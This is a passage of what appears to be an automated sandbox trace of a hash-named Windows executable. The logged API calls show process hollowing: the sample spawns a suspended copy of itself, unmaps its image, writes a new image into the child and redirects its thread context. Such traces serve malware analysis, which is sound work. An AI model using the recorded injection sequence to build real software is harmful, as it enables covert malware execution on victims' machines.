returned 0x0 [0088.858] GetLastError () returned 0x0 [0088.858] GetLastError () returned 0x0 [0088.858] GetLastError () returned 0x0 [0088.859] GetLastError () returned 0x0 [0088.859] GetLastError () returned 0x0 [0088.859] GetLastError () returned 0x0 [0088.859] GetLastError () returned 0x0 [0088.859] GetLastError () returned 0x0 [0088.859] GetLastError () returned 0x0 [0088.859] GetLastError () returned 0x0 [0088.859] GetLastError () returned 0x0 [0088.859] GetLastError () returned 0x0 [0088.859] GetLastError () returned 0x0 [0088.859] GetLastError () returned 0x0 [0088.859] GetLastError () returned 0x0 [0088.859] GetLastError () returned 0x0 [0088.859] GetLastError () returned 0x0 [0088.859] GetLastError () returned 0x0 [0088.859] GetLastError () returned 0x0 [0088.859] GetLastError () returned 0x0 [0088.860] GetLastError () returned 0x0 [0088.860] GetLastError () returned 0x0 [0088.860] GetLastError () returned 0x0 [0088.860] GetLastError () returned 0x0 [0088.860] GetLastError () returned 0x0 [0088.860] GetLastError () returned 0x0 [0088.860] GetLastError () returned 0x0 [0088.860] GetLastError () returned 0x0 [0088.860] GetLastError () returned 0x0 [0088.860] GetLastError () returned 0x0 [0088.860] GetLastError () returned 0x0 [0088.860] GetLastError () returned 0x0 [0088.860] GetLastError () returned 0x0 [0088.860] GetLastError () returned 0x0 [0088.860] GetLastError () returned 0x0 [0088.860] GetLastError () returned 0x0 [0088.860] GetLastError () returned 0x0 [0088.860] GetLastError () returned 0x0 [0088.861] GetLastError () returned 0x0 [0088.861] GetLastError () returned 0x0 [0088.861] GetLastError () returned 0x0 [0088.861] GetLastError () returned 0x0 [0088.861] GetLastError () returned 0x0 [0088.861] GetLastError () returned 0x0 [0088.861] GetLastError () returned 0x0 [0088.861] GetLastError () returned 0x0 [0088.861] GetLastError () returned 0x0 [0088.861] GetLastError () returned 0x0 [0088.861] GetLastError () returned 0x0 [0088.861] GetLastError () returned 0x0 [0088.861] GetLastError () returned 0x0 [0088.861] GetLastError () returned 0x0 [0088.861] GetLastError () returned 0x0 [0088.861] GetLastError () returned 0x0 [0088.861] GetLastError () returned 0x0 [0088.861] GetLastError () returned 0x0 [0088.861] GetLastError () returned 0x0 [0088.862] GetLastError () returned 0x0 [0088.862] GetLastError () returned 0x0 [0088.862] GetLastError () returned 0x0 [0088.862] GetLastError () returned 0x0 [0088.862] GetLastError () returned 0x0 [0088.862] GetLastError () returned 0x0 [0088.862] GetLastError () returned 0x0 [0088.862] GetLastError () returned 0x0 [0088.862] GetLastError () returned 0x0 [0088.862] GetLastError () returned 0x0 [0088.862] GetLastError () returned 0x0 [0088.862] GetLastError () returned 0x0 [0088.862] GetLastError () returned 0x0 [0088.862] GetLastError () returned 0x0 [0088.862] GetLastError () returned 0x0 [0088.862] GetLastError () returned 0x0 [0088.862] GetLastError () returned 0x0 [0088.862] GetLastError () returned 0x0 [0088.863] GetLastError () returned 0x0 [0088.863] GetLastError () returned 0x0 [0088.863] GetLastError () returned 0x0 [0088.863] GetLastError () returned 0x0 [0088.863] GetLastError () returned 0x0 [0088.863] GetLastError () returned 0x0 [0088.863] GetLastError () returned 0x0 [0088.863] GetLastError () returned 0x0 [0088.863] GetLastError () returned 0x0 [0088.863] GetLastError () returned 0x0 [0088.863] GetLastError () returned 0x0 [0088.863] GetLastError () returned 0x0 [0088.863] GetLastError () returned 0x0 [0088.863] GetLastError () returned 0x0 [0088.863] GetLastError () returned 0x0 [0088.863] GetLastError () returned 0x0 [0088.863] GetLastError () returned 0x0 [0088.863] GetLastError () returned 0x0 [0088.864] GetLastError () returned 0x0 [0088.864] GetLastError () returned 0x0 [0088.864] GetLastError () returned 0x0 [0088.864] GetLastError () returned 0x0 [0088.864] GetLastError () returned 0x0 [0088.864] GetLastError () returned 0x0 [0088.864] GetLastError () returned 0x0 [0088.864] GetLastError () returned 0x0 [0088.864] GetLastError () returned 0x0 [0088.864] GetLastError () returned 0x0 [0088.864] GetLastError () returned 0x0 [0088.864] GetLastError () returned 0x0 [0088.864] GetLastError () returned 0x0 [0088.864] GetLastError () returned 0x0 [0088.864] GetLastError () returned 0x0 [0088.864] GetLastError () returned 0x0 [0088.864] GetLastError () returned 0x0 [0088.864] GetLastError () returned 0x0 [0088.865] GetLastError () returned 0x0 [0088.865] GetLastError () returned 0x0 [0088.865] GetLastError () returned 0x0 [0088.865] GetLastError () returned 0x0 [0088.865] GetLastError () returned 0x0 [0088.865] GetLastError () returned 0x0 [0088.865] GetLastError () returned 0x0 [0088.865] GetLastError () returned 0x0 [0088.865] GetLastError () returned 0x0 [0088.865] GetLastError () returned 0x0 [0088.865] GetLastError () returned 0x0 [0088.865] GetLastError () returned 0x0 [0089.074] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x74f30000 [0089.074] GetProcAddress (hModule=0x74f30000, lpProcName="GlobalAlloc") returned 0x74f49950 [0089.075] GetProcAddress (hModule=0x74f30000, lpProcName="GetLastError") returned 0x74f43870 [0089.075] GetProcAddress (hModule=0x74f30000, lpProcName="Sleep") returned 0x74f47990 [0089.075] GetProcAddress (hModule=0x74f30000, lpProcName="VirtualAlloc") returned 0x74f47810 [0089.075] GetProcAddress (hModule=0x74f30000, lpProcName="CreateToolhelp32Snapshot") returned 0x74f57b50 [0089.075] GetProcAddress (hModule=0x74f30000, lpProcName="Module32First") returned 0x74f744b0 [0089.075] GetProcAddress (hModule=0x74f30000, lpProcName="CloseHandle") returned 0x74f56630 [0089.075] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0xa0 [0089.108] Module32First (hSnapshot=0xa0, lpme=0x19c1ac) returned 1 [0089.108] VirtualAlloc (lpAddress=0x0, dwSize=0x89a0, flAllocationType=0x1000, flProtect=0x40) returned 0x30000 [0089.114] LoadLibraryA (lpLibFileName="user32") returned 0x750d0000 [0091.497] GetProcAddress (hModule=0x750d0000, lpProcName="MessageBoxA") returned 0x7514fec0 [0091.497] GetProcAddress (hModule=0x750d0000, lpProcName="GetMessageExtraInfo") returned 0x75103690 [0091.498] LoadLibraryA (lpLibFileName="kernel32") returned 0x74f30000 [0091.498] GetProcAddress (hModule=0x74f30000, lpProcName="WinExec") returned 0x74f6ff70 [0091.498] GetProcAddress (hModule=0x74f30000, lpProcName="CreateFileA") returned 0x74f56880 [0091.498] GetProcAddress (hModule=0x74f30000, lpProcName="WriteFile") returned 0x74f56ca0 [0091.498] GetProcAddress (hModule=0x74f30000, lpProcName="CloseHandle") returned 0x74f56630 [0091.498] GetProcAddress (hModule=0x74f30000, lpProcName="CreateProcessA") returned 0x74f70750 [0091.498] GetProcAddress (hModule=0x74f30000, lpProcName="GetThreadContext") returned 0x74f4ec60 [0091.498] GetProcAddress (hModule=0x74f30000, lpProcName="VirtualAlloc") returned 0x74f47810 [0091.498] GetProcAddress (hModule=0x74f30000, lpProcName="VirtualAllocEx") returned 0x74f72730 [0091.498] GetProcAddress (hModule=0x74f30000, lpProcName="VirtualFree") returned 0x74f47600 [0091.498] GetProcAddress (hModule=0x74f30000, lpProcName="ReadProcessMemory") returned 0x74f71c80 [0091.498] GetProcAddress (hModule=0x74f30000, lpProcName="WriteProcessMemory") returned 0x74f72850 [0091.498] GetProcAddress (hModule=0x74f30000, lpProcName="SetThreadContext") returned 0x74f72490 [0091.499] GetProcAddress (hModule=0x74f30000, lpProcName="ResumeThread") returned 0x74f4a800 [0091.499] GetProcAddress (hModule=0x74f30000, lpProcName="WaitForSingleObject") returned 0x74f56820 [0091.499] GetProcAddress (hModule=0x74f30000, lpProcName="GetModuleFileNameA") returned 0x74f4a720 [0091.499] GetProcAddress (hModule=0x74f30000, lpProcName="GetCommandLineA") returned 0x74f4ab60 [0091.499] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77b90000 [0091.499] GetProcAddress (hModule=0x77b90000, lpProcName="NtUnmapViewOfSection") returned 0x77c06f40 [0091.499] GetProcAddress (hModule=0x77b90000, lpProcName="NtWriteVirtualMemory") returned 0x77c07040 [0091.499] GetProcAddress (hModule=0x750d0000, lpProcName="RegisterClassExA") returned 0x75104e90 [0091.499] GetProcAddress (hModule=0x750d0000, lpProcName="CreateWindowExA") returned 0x75106f30 [0091.499] GetProcAddress (hModule=0x750d0000, lpProcName="PostMessageA") returned 0x750ff0e0 [0091.500] GetProcAddress (hModule=0x750d0000, lpProcName="GetMessageA") returned 0x750fe130 [0091.500] GetProcAddress (hModule=0x750d0000, lpProcName="DefWindowProcA") returned 0x77c1aed0 [0091.500] GetProcAddress (hModule=0x74f30000, lpProcName="GetFileAttributesA") returned 0x74f56a20 [0091.500] GetProcAddress (hModule=0x74f30000, lpProcName="GetStartupInfoA") returned 0x74f49c10 [0091.500] GetProcAddress (hModule=0x74f30000, lpProcName="VirtualProtectEx") returned 0x74f72790 [0091.500] GetProcAddress (hModule=0x74f30000, lpProcName="ExitProcess") returned 0x74f57b30 [0091.500] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\apfhq")) returned 0xffffffff [0091.501] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\apfhq")) returned 0xffffffff [0091.501] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\apfhq")) returned 0xffffffff [0091.501] RegisterClassExA (param_1=0x19be68) returned 0xc1da [0091.502] CreateWindowExA (dwExStyle=0x200, lpClassName="saodkfnosa9uin", lpWindowName="mfoaskdfnoa", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=1000, nHeight=1000, hWndParent=0x0, hMenu=0x0, hInstance=0x0, lpParam=0x0) returned 0x801f6 [0099.208] PostMessageA (hWnd=0x801f6, Msg=0x400, wParam=0x64, lParam=0x1f4) returned 1 [0099.209] GetMessageA (in: lpMsg=0x19be98, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19be98) returned 1 [0099.209] GetMessageA (in: lpMsg=0x19be98, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19be98) returned 1 [0099.209] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x1000, flProtect=0x4) returned 0x560000 [0099.209] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x560000, nSize=0x2800 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\6c02cd3294f998736222c255ddd163b9d5e72dfbf3492bfdd43519a46ed609de.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\6c02cd3294f998736222c255ddd163b9d5e72dfbf3492bfdd43519a46ed609de.exe")) returned 0x62 [0099.210] GetStartupInfoA (in: lpStartupInfo=0x19bdbc | out: lpStartupInfo=0x19bdbc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\6c02cd3294f998736222c255ddd163b9d5e72dfbf3492bfdd43519a46ed609de.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0099.210] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\6c02cd3294f998736222c255ddd163b9d5e72dfbf3492bfdd43519a46ed609de.exe\" " [0099.210] CreateProcessA (in: lpApplicationName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\6c02cd3294f998736222c255ddd163b9d5e72dfbf3492bfdd43519a46ed609de.exe", lpCommandLine="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\6c02cd3294f998736222c255ddd163b9d5e72dfbf3492bfdd43519a46ed609de.exe\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000004, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x19bdbc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\6c02cd3294f998736222c255ddd163b9d5e72dfbf3492bfdd43519a46ed609de.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0), lpProcessInformation=0x19be14 | out: lpCommandLine="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\6c02cd3294f998736222c255ddd163b9d5e72dfbf3492bfdd43519a46ed609de.exe\" ", lpProcessInformation=0x19be14*(hProcess=0x118, hThread=0x114, dwProcessId=0x2dc, dwThreadId=0x348)) returned 1 [0100.185] VirtualFree (lpAddress=0x560000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.186] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x1000, flProtect=0x4) returned 0x560000 [0100.187] GetThreadContext (in: hThread=0x114, lpContext=0x560000 | out: lpContext=0x560000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x2e9000, Edx=0x0, Ecx=0x0, Eax=0x41c630, Ebp=0x0, Eip=0x77c08fe0, SegCs=0x23, EFlags=0x202, Esp=0x19fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0100.193] ReadProcessMemory (in: hProcess=0x118, lpBaseAddress=0x2e9008, lpBuffer=0x19be08, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x19be08*, lpNumberOfBytesRead=0x0) returned 1 [0100.199] NtUnmapViewOfSection (ProcessHandle=0x118, BaseAddress=0x400000) returned 0x0 [0100.204] VirtualAllocEx (hProcess=0x118, lpAddress=0x400000, dwSize=0x9000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0100.209] NtWriteVirtualMemory (in: ProcessHandle=0x118, BaseAddress=0x400000, Buffer=0x315a0*, NumberOfBytesToWrite=0x200, NumberOfBytesWritten=0x0 | out: Buffer=0x315a0*, NumberOfBytesWritten=0x0) returned 0x0 [0100.247] NtWriteVirtualMemory (in: ProcessHandle=0x118, BaseAddress=0x401000, Buffer=0x317a0*, NumberOfBytesToWrite=0x7200, NumberOfBytesWritten=0x0 | out: Buffer=0x317a0*, NumberOfBytesWritten=0x0) returned 0x0 [0100.274] WriteProcessMemory (in: hProcess=0x118, lpBaseAddress=0x2e9008, lpBuffer=0x31654*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x31654*, lpNumberOfBytesWritten=0x0) returned 1 [0100.502] SetThreadContext (hThread=0x114, lpContext=0x560000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x2e9000, Edx=0x0, Ecx=0x0, Eax=0x402f47, Ebp=0x0, Eip=0x77c08fe0, SegCs=0x23, EFlags=0x202, Esp=0x19fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, 